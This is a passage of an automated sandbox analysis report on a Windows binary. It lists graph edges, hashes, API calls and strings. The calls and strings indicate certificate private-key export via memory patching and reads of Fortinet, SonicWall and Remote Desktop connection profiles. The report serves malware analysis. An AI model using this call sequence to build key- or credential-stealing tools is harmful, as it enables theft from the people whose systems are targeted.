7ff6dfe2a081-7ff6dfe2a0bf call 7ff6dfe21990 call 7ff6dfe226b0 539->542 547 7ff6dfe2a0c2-7ff6dfe2a0d1 542->547 547->547 548 7ff6dfe2a0d3-7ff6dfe2a0e4 call 7ff6dfe297dc 547->548 548->385 551 7ff6dfe2a0ea-7ff6dfe2a132 call 7ff6dfe21990 call 7ff6dfe226b0 548->551 556 7ff6dfe2a136-7ff6dfe2a146 551->556 556->556 557 7ff6dfe2a148-7ff6dfe2a159 call 7ff6dfe297dc 556->557 557->385 560 7ff6dfe2a15f-7ff6dfe2a1a1 call 7ff6dfe21990 call 7ff6dfe226b0 557->560 565 7ff6dfe2a1a7-7ff6dfe2a1b7 560->565 565->565 566 7ff6dfe2a1b9-7ff6dfe2a1ca call 7ff6dfe297dc 565->566 566->385 569 7ff6dfe2a1d0-7ff6dfe2a203 call 7ff6dfe21990 call 7ff6dfe226b0 566->569 574 7ff6dfe2a206-7ff6dfe2a216 569->574 574->574 575 7ff6dfe2a218-7ff6dfe2a229 call 7ff6dfe297dc 574->575 575->385 578 7ff6dfe2a22f-7ff6dfe2a26c call 7ff6dfe21990 call 7ff6dfe226b0 575->578 583 7ff6dfe2a26f-7ff6dfe2a27f 578->583 583->583 584 7ff6dfe2a281-7ff6dfe2a292 call 7ff6dfe297dc 583->584 584->385 587 7ff6dfe2a298-7ff6dfe2a2ca call 7ff6dfe21990 call 7ff6dfe226b0 584->587 592 7ff6dfe2a2cd-7ff6dfe2a2dd 587->592 592->592 593 7ff6dfe2a2df-7ff6dfe2a2f0 call 7ff6dfe297dc 592->593 593->385 596 7ff6dfe2a2f6-7ff6dfe2a333 call 7ff6dfe21990 call 7ff6dfe226b0 593->596 601 7ff6dfe2a339-7ff6dfe2a348 596->601 601->601 602 7ff6dfe2a34a-7ff6dfe2a35b call 7ff6dfe297dc 601->602 602->385 605 7ff6dfe2a361-7ff6dfe2a399 call 7ff6dfe21990 call 7ff6dfe226b0 602->605 610 7ff6dfe2a39c-7ff6dfe2a3ab 605->610 610->610 611 7ff6dfe2a3ad-7ff6dfe2a3be call 7ff6dfe297dc 610->611 611->385 614 7ff6dfe2a3c4-7ff6dfe2a414 call 7ff6dfe21990 call 7ff6dfe226b0 611->614 619 7ff6dfe2a417-7ff6dfe2a426 614->619 619->619 620 7ff6dfe2a428-7ff6dfe2a439 call 7ff6dfe297dc 619->620 620->385 623 7ff6dfe2a43f-7ff6dfe2a475 call 7ff6dfe21990 call 7ff6dfe226b0 620->623 628 7ff6dfe2a478-7ff6dfe2a488 623->628 628->628 629 7ff6dfe2a48a-7ff6dfe2a49b call 7ff6dfe297dc 628->629 629->385 632 7ff6dfe2a49d-7ff6dfe2a4cb call 7ff6dfe21990 call 7ff6dfe226b0 629->632 637 7ff6dfe2a4ce-7ff6dfe2a4dd 632->637 637->637 638 7ff6dfe2a4df-7ff6dfe2a4f0 call 7ff6dfe297dc 637->638 638->385 641 7ff6dfe2a4f2-7ff6dfe2a4f6 call 7ff6dfe29478 638->641 641->385
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: sDs$'s)s$?: '
                                                                                            • API String ID: 0-2673205255
                                                                                            • Opcode ID: 738f978cd6ad19bdb082bcf6a84014457167de0e7706548bc7d5ddc08a66e7e6
                                                                                            • Instruction ID: 61ec33365bb7bda9e6b6fe2ada5246f93b1c88d0908131feebcff1e7f24bf6f8
                                                                                            • Opcode Fuzzy Hash: 738f978cd6ad19bdb082bcf6a84014457167de0e7706548bc7d5ddc08a66e7e6
                                                                                            • Instruction Fuzzy Hash: 9C525362F0578269EB20DFB194151FD27A26B867C8F445036DE4DABB8BEE3ED125C340

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetProcessHeap.KERNEL32(?,?,?,00007FF6DFE21951,?,?,00000000,00007FF6DFE219BA), ref: 00007FF6DFE22669
                                                                                            • RtlReAllocateHeap.NTDLL(?,?,?,00007FF6DFE21951,?,?,00000000,00007FF6DFE219BA), ref: 00007FF6DFE2267A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$AllocateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1357844191-0
                                                                                            • Opcode ID: bc09a8f51c988994e8a976bfcc15b65bca753258698eea1a68c770aa776c35ff
                                                                                            • Instruction ID: b40f96d83f70ad165a09db4251797cec7c513e54313fe8899688643c8e8a241d
                                                                                            • Opcode Fuzzy Hash: bc09a8f51c988994e8a976bfcc15b65bca753258698eea1a68c770aa776c35ff
                                                                                            • Instruction Fuzzy Hash: E0E08615E08587A1F9189B92F95407D5361AFC9BC1F48C036DD0E87755DD2DD4654600

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CertEnumCertificatesInStore.CRYPT32 ref: 00007FF6DFE22D90
                                                                                            • CertGetNameStringW.CRYPT32 ref: 00007FF6DFE22DD3
                                                                                            • CertNameToStrW.CRYPT32 ref: 00007FF6DFE22EB8
                                                                                            • CertNameToStrW.CRYPT32 ref: 00007FF6DFE22F0A
                                                                                            • FileTimeToSystemTime.KERNEL32 ref: 00007FF6DFE22F4B
                                                                                            • FileTimeToSystemTime.KERNEL32 ref: 00007FF6DFE22FC1
                                                                                              • Part of subcall function 00007FF6DFE21A70: wvsprintfW.USER32 ref: 00007FF6DFE21AA9
                                                                                              • Part of subcall function 00007FF6DFE225B4: GetProcessHeap.KERNEL32 ref: 00007FF6DFE225C1
                                                                                              • Part of subcall function 00007FF6DFE225B4: RtlFreeHeap.NTDLL ref: 00007FF6DFE225CF
                                                                                            • CertEnumCertificatesInStore.CRYPT32 ref: 00007FF6DFE23178
                                                                                              • Part of subcall function 00007FF6DFE23220: CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE2325E
                                                                                              • Part of subcall function 00007FF6DFE23220: CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF6DFE2328D
                                                                                              • Part of subcall function 00007FF6DFE23220: CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE232BB
                                                                                              • Part of subcall function 00007FF6DFE23220: LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE23336
                                                                                              • Part of subcall function 00007FF6DFE23220: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE23380
                                                                                              • Part of subcall function 00007FF6DFE23220: VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6DFE233AC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cert$Time$Name$CertificateCertificatesCryptEnumFileHeapStoreSystem$AcquireAddressContextFreeLibraryLoadPrivateProcProcessPropertyProtectStringUserVirtualwvsprintf
                                                                                            • String ID: 1.2.840.113549
                                                                                            • API String ID: 2787208766-3888290641
                                                                                            • Opcode ID: a5052541921af31a92bb83a9905a4357149baaf2a43a2cd8acc9bc44617fdd92
                                                                                            • Instruction ID: 8507f27f02b6115439e56edaa32baa998941ace4aa4cf718b642bf0462b2e35c
                                                                                            • Opcode Fuzzy Hash: a5052541921af31a92bb83a9905a4357149baaf2a43a2cd8acc9bc44617fdd92
                                                                                            • Instruction Fuzzy Hash: A5B1C462A08642A5E760DF22D4402BEA3A1FBC5BC4F404037EE8D87B69EF3DD125CB40

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateErrorLast$Pipe$CloseHandleProcess
                                                                                            • String ID:
                                                                                            • API String ID: 2620922840-0
                                                                                            • Opcode ID: aaa0612b3fd30c93b4769d3853684a8ad1b8f30a6c0de2de8c6a0fef772f0667
                                                                                            • Instruction ID: d397d0af0ada2726e84bb6a2ca69e0d2971ac9d395039cf45240ad84ec138aba
                                                                                            • Opcode Fuzzy Hash: aaa0612b3fd30c93b4769d3853684a8ad1b8f30a6c0de2de8c6a0fef772f0667
                                                                                            • Instruction Fuzzy Hash: A8515F32B08A46A9FB20DF71D4847ED23A1ABD9788F414036DE0DD7A99EE3DD159C340

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cert$NameStore$CertificatesCloseEnumOpenString
                                                                                            • String ID: *sms$gszs$zszs
                                                                                            • API String ID: 3617724111-4219868587
                                                                                            • Opcode ID: 185f5889c02d33174366d98b6c19ba59845491b568fd27e41f5e9029496b6ffa
                                                                                            • Instruction ID: 1c303f34ab36e62646c40c7226a230d828eec5a7aad551f94cfd6c7d798207fb
                                                                                            • Opcode Fuzzy Hash: 185f5889c02d33174366d98b6c19ba59845491b568fd27e41f5e9029496b6ffa
                                                                                            • Instruction Fuzzy Hash: E621B672A18682A1EB60DF16E4152AE6361FBC5B80F449036EE8EC7769EF3DD514CB40

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: CertEnumStoreSystem
                                                                                            • String ID: ":{$"_":""
                                                                                            • API String ID: 4132996702-2026347918
                                                                                            • Opcode ID: 02997e885b2f021e2d77aaf3545baf76aa65b304f2a4f6736cd43391604a521e
                                                                                            • Instruction ID: 05b8a6e1986236fcf81c0e94994d7433c2c46e77e92e85663125375d15c6f487
                                                                                            • Opcode Fuzzy Hash: 02997e885b2f021e2d77aaf3545baf76aa65b304f2a4f6736cd43391604a521e
                                                                                            • Instruction Fuzzy Hash: 25016D21E08A4271FA14DB56E4440BD6395AFC9BC5F489037ED5DC777ADF2CD6628700

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: CertEnumLocationStoreSystem
                                                                                            • String ID: "_": ""
                                                                                            • API String ID: 863500693-1453221996
                                                                                            • Opcode ID: ac8b6152a2a2325c9d9276e908165484d39c70b2a51ab9d8d04172e70dc37df3
                                                                                            • Instruction ID: 93702a1d07aff5dc677c0e2e34156a2cd378c76a85bd16aca57ac1beca8f7ca0
                                                                                            • Opcode Fuzzy Hash: ac8b6152a2a2325c9d9276e908165484d39c70b2a51ab9d8d04172e70dc37df3
                                                                                            • Instruction Fuzzy Hash: 83E06D51F1850370EE54AB62E8550FC53556FC97C1F882037EC1EC6376ED2DD1A98300

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileNamedPeekPipeRead
                                                                                            • String ID:
                                                                                            • API String ID: 327342812-0
                                                                                            • Opcode ID: 7f115bf4007d67bfdfc29d9dfe0ac2456264c6eed9dcc6533d655e64355cf705
                                                                                            • Instruction ID: 72e6fd0d4e3bdf5348fadfd52bdd40459e34f29a0e9cab07141f57b904fcc5b8
                                                                                            • Opcode Fuzzy Hash: 7f115bf4007d67bfdfc29d9dfe0ac2456264c6eed9dcc6533d655e64355cf705
                                                                                            • Instruction Fuzzy Hash: B4016D22B1864293E7608B56E40477EA3A1FBC5BD8F144135DA48CB654EFBDD4548B40

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: CodeExitNamedObjectPeekPipeProcessSingleWait
                                                                                            • String ID:
                                                                                            • API String ID: 2021502500-0
                                                                                            • Opcode ID: 8118cb50f4080a30a6e6e506748c6a61c7a035189441b92ba572f26101741018
                                                                                            • Instruction ID: 96ebc246cc217dc1f698476336303d3df437766032d3510fc4bc9a87b35454df
                                                                                            • Opcode Fuzzy Hash: 8118cb50f4080a30a6e6e506748c6a61c7a035189441b92ba572f26101741018
                                                                                            • Instruction Fuzzy Hash: 08012922A08647A2EF608F21D49437D23A1FFC4B8CF186536CA0DC6599EF6EDCA5D300

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 682 7ff6dfe225b4-7ff6dfe225b7 683 7ff6dfe225b9-7ff6dfe225d9 GetProcessHeap RtlFreeHeap 682->683 684 7ff6dfe225da 682->684 683->684
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$FreeProcess
                                                                                            • String ID:
                                                                                            • API String ID: 3859560861-0
                                                                                            • Opcode ID: 3522ce1484baedbfe33511e301451e993b837232db68b9421e2362fa418d2ba1
                                                                                            • Instruction ID: 8fcef5169e86ff8429b3b215528f7bb205cacd3f8033c7f8898c351d439af6ef
                                                                                            • Opcode Fuzzy Hash: 3522ce1484baedbfe33511e301451e993b837232db68b9421e2362fa418d2ba1
                                                                                            • Instruction Fuzzy Hash: BDC01244E0660262FE2897E368180B943916FDAB82B088036CD0A86761DE2D51F54200

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 685 7ff6dfe21a70-7ff6dfe21ab8 call 7ff6dfe21918 wvsprintfW
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: wvsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 2795597889-0
                                                                                            • Opcode ID: 1ee19605ac26c83bc426fe2672bc05ad22fbb01a022c874d8b8b7949f4abed9f
                                                                                            • Instruction ID: c13561a0b5beebec7a982fd041560930bebb951a787c686ace5b97fedc023c1a
                                                                                            • Opcode Fuzzy Hash: 1ee19605ac26c83bc426fe2672bc05ad22fbb01a022c874d8b8b7949f4abed9f
                                                                                            • Instruction Fuzzy Hash: 02E06DB2A00B45D2D7048F15E94008C7BB5EBD9FC8B548035CB4897324DF38DAA6C750

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 688 7ff6dfe279c4-7ff6dfe279d9 GetNativeSystemInfo 689 7ff6dfe279e7 688->689 690 7ff6dfe279db-7ff6dfe279e1 688->690 692 7ff6dfe279e9-7ff6dfe279ed 689->692 690->689 691 7ff6dfe279e3-7ff6dfe279e5 690->691 691->692
                                                                                            APIs
                                                                                            • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00007FF6DFE274DE), ref: 00007FF6DFE279CD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoNativeSystem
                                                                                            • String ID:
                                                                                            • API String ID: 1721193555-0
                                                                                            • Opcode ID: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
                                                                                            • Instruction ID: 39d4a84263e70d3a919c0606365b98aaed5c5ff81daf34f485248184cb9eb047
                                                                                            • Opcode Fuzzy Hash: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
                                                                                            • Instruction Fuzzy Hash: 14D05E02C08683A3DA316B00A40A03E23A1BBD0309F814237C28D824B0FF6E96A99A05
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true
                                                                                            • Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Path$ExistsHeap$AppendCreateEnvironmentProcessReadSizeVariable$CombineFreeQuoteSpaceslstrcatlstrlen
                                                                                            • String ID: ", "group": "$", "host": "$"user": "$</DefaultGroup>$</DefaultHostName>$</DefaultUser>$<DefaultGroup>$<DefaultHostName>$<DefaultUser>$Software\Fortinet\FortiClient\Sslvpn\Tunnels$Software\Microsoft\Terminal Server Client\Servers$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles$Software\SonicWall\SSL-VPN NetExtender\Standalone$]},$}},
                                                                                            • API String ID: 2508640211-1951492331
                                                                                            • Opcode ID: 1bb255e1f9bbd2e6d7fc8800ab426b3e9595c4d7a343f9b19d40a0c6e173b1ab
                                                                                            • Instruction ID: 2ebb9c9aad63ff6ad70d3044aa11a0e0d83e1562e1dfaff52079fe947ae3b345
                                                                                            • Opcode Fuzzy Hash: 1bb255e1f9bbd2e6d7fc8800ab426b3e9595c4d7a343f9b19d40a0c6e173b1ab
                                                                                            • Instruction Fuzzy Hash: 9712A161A1964375EA30EB25D8552FD63A2BFC5784F804037EA0DC76AAEF3ED625C700
                                                                                            APIs
                                                                                            • CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE2325E
                                                                                            • CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF6DFE2328D
                                                                                            • CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE232BB
                                                                                              • Part of subcall function 00007FF6DFE236F0: CryptExportKey.ADVAPI32 ref: 00007FF6DFE23744
                                                                                              • Part of subcall function 00007FF6DFE236F0: CryptExportKey.ADVAPI32 ref: 00007FF6DFE2379E
                                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE23336
                                                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE23380
                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6DFE233AC
                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6DFE233DC
                                                                                            • CryptExportKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6DFE23404
                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6DFE2341C
                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6DFE2343F
                                                                                            • CryptAcquireContextA.ADVAPI32 ref: 00007FF6DFE23459
                                                                                            • CryptImportKey.ADVAPI32 ref: 00007FF6DFE2347E
                                                                                            • OpenSCManagerA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE234B5
                                                                                            • OpenServiceA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE23505
                                                                                            • QueryServiceStatusEx.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE23523
                                                                                            • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE23532
                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE2355D
                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE2357C
                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6DFE2359F
                                                                                            • NCryptExportKey.NCRYPT ref: 00007FF6DFE23605
                                                                                            • CertOpenStore.CRYPT32 ref: 00007FF6DFE23667
                                                                                            • CertAddCertificateLinkToStore.CRYPT32 ref: 00007FF6DFE23682
                                                                                            • CertSetCertificateContextProperty.CRYPT32 ref: 00007FF6DFE2369E
                                                                                            • PFXExportCertStoreEx.CRYPT32 ref: 00007FF6DFE236BD
